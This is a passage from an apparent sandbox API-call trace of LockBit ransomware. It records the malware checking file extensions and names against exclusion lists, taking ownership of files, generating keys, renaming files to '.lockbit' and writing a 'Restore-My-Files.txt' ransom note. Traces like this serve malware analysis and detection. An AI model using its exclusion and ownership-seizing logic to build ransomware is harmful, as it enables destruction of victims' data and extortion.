lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0083.418] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0083.419] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0083.419] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0083.419] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0083.419] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0083.419] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Notes_INTRO_BG_PAL.wmv") returned 1 [0083.419] lstrcmpiW (lpString1="ntldr", lpString2="Notes_INTRO_BG_PAL.wmv") returned 1 [0083.419] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Notes_INTRO_BG_PAL.wmv") returned 1 [0083.419] lstrcmpiW (lpString1="bootsect.bak", lpString2="Notes_INTRO_BG_PAL.wmv") returned -1 [0083.419] lstrcmpiW (lpString1="autorun.inf", lpString2="Notes_INTRO_BG_PAL.wmv") returned -1 [0083.419] lstrcmpiW (lpString1="thumbs.db", lpString2="Notes_INTRO_BG_PAL.wmv") returned 1 [0083.419] lstrcmpiW (lpString1="iconcache.db", lpString2="Notes_INTRO_BG_PAL.wmv") returned -1 [0083.419] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0083.419] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv") returned=".wmv" [0083.419] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0083.419] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0083.419] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0083.419] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0083.420] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0083.421] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv.lockbit") returned 80 [0083.421] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_intro_bg_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.422] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0083.423] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0083.423] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0083.423] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0083.423] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0083.423] RtlFreeAnsiString (AnsiString="\\") [0083.423] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0083.423] malloc (_Size=0x200) returned 0x77d800 [0083.423] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0083.423] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.423] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.424] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.424] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.424] CloseHandle (hObject=0x3b8) returned 1 [0083.425] free (_Block=0x77d800) [0083.425] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_intro_bg_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0083.425] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0083.425] malloc (_Size=0x40068) returned 0x1fb18c0 [0083.425] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=253220) returned 1 [0083.425] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.426] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0083.426] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.426] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0083.426] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.432] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0083.432] malloc (_Size=0xb6) returned 0x1ff1e60 [0083.432] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb6, FileInformationClass=0xa) returned 0x0 [0083.441] free (_Block=0x1ff1e60) [0083.441] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0083.441] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0083.441] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.441] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x720763d4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x720763d4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e5d1ee3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc0b4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notes_LOOP_BG.wmv", cAlternateFileName="")) returned 1 [0083.441] lstrcmpiW (lpString1=".", lpString2="Notes_LOOP_BG.wmv") returned -1 [0083.441] lstrcmpiW (lpString1="..", lpString2="Notes_LOOP_BG.wmv") returned -1 [0083.441] PathFindExtensionW (pszPath="Notes_LOOP_BG.wmv") returned=".wmv" [0083.441] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0083.441] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0083.441] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0083.441] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0083.441] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0083.441] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0083.441] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0083.441] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0083.442] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0083.442] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0083.443] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0083.443] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0083.443] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0083.443] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0083.443] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0083.443] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0083.443] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0083.443] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0083.443] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0083.443] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0083.443] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0083.443] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0083.443] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0083.443] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0083.443] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0083.443] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0083.443] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0083.443] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Notes_LOOP_BG.wmv") returned 1 [0083.443] lstrcmpiW (lpString1="ntldr", lpString2="Notes_LOOP_BG.wmv") returned 1 [0083.443] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Notes_LOOP_BG.wmv") returned 1 [0083.443] lstrcmpiW (lpString1="bootsect.bak", lpString2="Notes_LOOP_BG.wmv") returned -1 [0083.443] lstrcmpiW (lpString1="autorun.inf", lpString2="Notes_LOOP_BG.wmv") returned -1 [0083.443] lstrcmpiW (lpString1="thumbs.db", lpString2="Notes_LOOP_BG.wmv") returned 1 [0083.444] lstrcmpiW (lpString1="iconcache.db", lpString2="Notes_LOOP_BG.wmv") returned -1 [0083.444] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0083.444] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv") returned=".wmv" [0083.444] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0083.444] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0083.444] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0083.444] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0083.444] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0083.444] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0083.444] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0083.444] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0083.444] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0083.444] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0083.444] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0083.444] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0083.444] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0083.444] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0083.444] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0083.444] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0083.444] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0083.444] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0083.444] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0083.445] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0083.445] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0083.445] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0083.445] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0083.445] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0083.445] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0083.445] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0083.445] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0083.445] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0083.445] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv.lockbit") returned 75 [0083.445] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.446] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0083.446] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0083.446] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0083.446] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0083.446] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0083.447] RtlFreeAnsiString (AnsiString="\\") [0083.447] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0083.447] malloc (_Size=0x200) returned 0x77d800 [0083.447] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0083.447] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.447] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.447] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.455] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.455] CloseHandle (hObject=0x3b8) returned 1 [0083.455] free (_Block=0x77d800) [0083.455] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0083.456] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0083.456] malloc (_Size=0x40068) returned 0x1fb18c0 [0083.456] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=789322) returned 1 [0083.456] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.456] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.456] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0083.457] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.457] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.457] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0083.457] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.463] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0083.463] malloc (_Size=0xac) returned 0x1ff1e60 [0083.463] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xac, FileInformationClass=0xa) returned 0x0 [0083.472] free (_Block=0x1ff1e60) [0083.472] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0083.472] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0083.472] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.472] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7210e948, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7210e948, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e61e19f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xd43ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notes_LOOP_BG_PAL.wmv", cAlternateFileName="")) returned 1 [0083.472] lstrcmpiW (lpString1=".", lpString2="Notes_LOOP_BG_PAL.wmv") returned -1 [0083.472] lstrcmpiW (lpString1="..", lpString2="Notes_LOOP_BG_PAL.wmv") returned -1 [0083.472] PathFindExtensionW (pszPath="Notes_LOOP_BG_PAL.wmv") returned=".wmv" [0083.472] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0083.472] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0083.472] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0083.472] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0083.472] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0083.472] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0083.472] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0083.472] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0083.472] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0083.472] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0083.473] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0083.473] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0083.474] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0083.474] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0083.474] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0083.474] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0083.474] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0083.474] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0083.474] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0083.474] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0083.474] 